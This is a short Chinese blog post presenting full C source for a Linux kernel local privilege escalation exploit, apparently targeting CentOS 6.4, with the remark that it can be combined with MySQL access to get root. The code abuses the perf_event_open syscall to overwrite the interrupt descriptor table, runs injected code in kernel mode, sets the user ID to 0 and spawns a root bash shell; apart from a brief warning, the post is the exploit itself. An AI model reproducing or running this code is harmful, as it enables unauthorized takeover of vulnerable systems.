Centos6.4内核版本2.6.3.2 EXP

可以使用Mysql+EXP提权到Root

 1 #define _GNU_SOURCE 1
 2 #include <stdint.h>
 3 #include <stdio.h>
 4 #include <stdlib.h>
 5 #include <string.h>
 6 #include <unistd.h>
 7 #include <sys/mman.h>
 8 #include <syscall.h>
 9 #include <stdint.h>
10 #include <assert.h>
11 
12 #define BASE  0x380000000
13 #define SIZE  0x010000000
14 #define KSIZE  0x2000000
15 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))
16 
17 void fuck() {
18   int i,j,k;
19   uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
20   uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
21   uint64_t kbase = ((uint64_t)current)>>36;
22   uint32_t *fixptr = (void*) AB(1);
23   *fixptr = -1;
24 
25   for (i=0; i<4000; i+=4) {
26     uint64_t *p = (void *)&current[i];
27     uint32_t *t = (void*) p[0];
28     if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
29     for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
30       if (((uint32_t*)uids)[k] != t[j+k]) goto next;
31       for (i = 0; i < 8; i++) t[j+i] = 0;
32       for (i = 0; i < 10; i++) t[j+9+i] = -1;
33       return;
34 next:;    }
35   }
36 }
37 
38 void sheep(uint32_t off) {
39   uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
40   int fd = syscall(298, buf, 0, -1, -1, 0);
41   assert(!close(fd));
42 }
43 
44 
45 int  main() {
46   uint64_t  u,g,needle, kbase, *p; uint8_t *code;
47   uint32_t *map, j = 5;
48   int i;
49   struct {
50     uint16_t limit;
51     uint64_t addr;
52   } __attribute__((packed)) idt;
53   assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
54   memset(map, 0, SIZE);
55   sheep(-1); sheep(-2);
56   for (i = 0; i < SIZE/4; i++) if (map[i]) {
57     assert(map[i+1]);
58     break;
59   }
60   assert(i<SIZE/4);
61   asm ("sidt %0" : "=m" (idt));
62   kbase = idt.addr & 0xff000000;
63   u = getuid(); g = getgid();
64   assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
65   memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
66   memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
67     printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
68   setresuid(u,u,u); setresgid(g,g,g);
69   while (j--) {
70     needle = AB(j+1);
71     assert(p = memmem(code, 1024, &needle, 8));
72     if (!p) continue;
73     *p = j?((g<<32)|u):(idt.addr + 0x48);
74   }
75   sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
76   asm("int $0x4");  assert(!setuid(0));
77   return execl("/bin/bash", "-sh", NULL);
78 }

注意：本代码具有极强攻击性，请勿作死！

posted @ 2016-08-16 13:05 TalentLiu 阅读(566) 评论(0) 收藏举报

刷新页面返回顶部

TalentLiu

追求梦想，无限Perfect

Centos6.4内核版本2.6.3.2 EXP

公告